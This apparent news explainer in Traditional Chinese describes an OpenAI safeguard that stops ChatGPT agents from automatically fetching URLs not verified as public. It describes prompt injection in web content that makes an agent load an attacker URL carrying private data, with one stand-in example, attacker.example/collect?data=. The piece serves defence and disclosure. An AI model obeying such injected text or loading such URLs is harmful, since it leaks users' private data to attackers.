OpenAI AI 代理連結安全

OpenAI 已推出一項新的安全措施,以防止 AI 代理透過 URL 壓洩敏感使用者資料。透過將自動 URL 抓取限制為僅限於已知公開存在於網路上的位址,OpenAI 旨在減輕與 ChatGPT 中代理體驗相關的基於 URL 的資料外洩風險。

防止基於 URL 的資料外洩

AI 代理可能被操縱請求包含敏感使用者資訊(例如電子郵件地址或文件標題)的 URL,這些資訊以查詢參數的形式嵌入。由於網站會在伺服器日誌中記錄請求的 URL,即使模型不會在聊天中明確輸出敏感資訊,攻擊者仍可捕獲此私人資料。

此風險會因提示注入技術而被放大,攻擊者會在網頁內容中放置指令,以覆寫模型行為並迫使代理載入特定的惡意 URL(例如 https://attacker.example/collect?data=<private_info>)。

傳統信任清單的限制

OpenAI 指出,簡單的「可信網站清單」或允許清單因兩個主要原因而不足:

  1. 重新導向: 連結可能從可信網域開始,但會將代理重新導向至攻擊者控制的目的地。
  2. 使用者體驗: 嚴格的允許清單會造成過度摩擦和「誤報」,導致使用者忽略安全警告。

與其關注域名是否具有信譽,不如說 OpenAI 的方法著重於判斷特定 URL 是否適合自動抓取。

公開 URL 驗證系統

為確保 URL 不包含使用者特定的秘密,OpenAI 使用一個獨立的網路索引(爬蟲)來發現公開 URL,且不會存取任何使用者對話、帳戶或個人資料。

當代理嘗試自動檢索 URL 時,系統會將該 URL 與此索引進行比對:

  • 已驗證的公開 URL: 如果 URL 與先前觀察到的公開 URL 匹配,代理會自動載入該 URL。
  • 未驗證的 URL: 若找不到匹配項,則將該 URL 視為未驗證。代理可能會被告知嘗試其他網站,或系統會透過警告對話框要求使用者採取明確行動。

使用者介面與控制

當連結無法被驗證為公開時,使用者可能會看到警告,指出該連結未經驗證,並可能與第三方網站共享對話資料。這可以防止「靜默洩漏」,否則模型可能會在使用者不知情的背景下載入資源。

範圍與深度防禦

此防護措施專門設計用於在資料抓取過程中,防止透過 URL 本身洩漏使用者特定資料。這不是解決所有網路安全問題的全面方案。具體來說,它無法保證:

  • 網頁內容的可信度。
  • 防禦社交工程攻擊。
  • 頁面上存在誤導或有害指令。

OpenAI 將此視為更廣泛深度防禦策略的一層,該策略包括針對提示注入的模型級緩解措施、產品控制、監控以及持續的紅隊演練。

Sources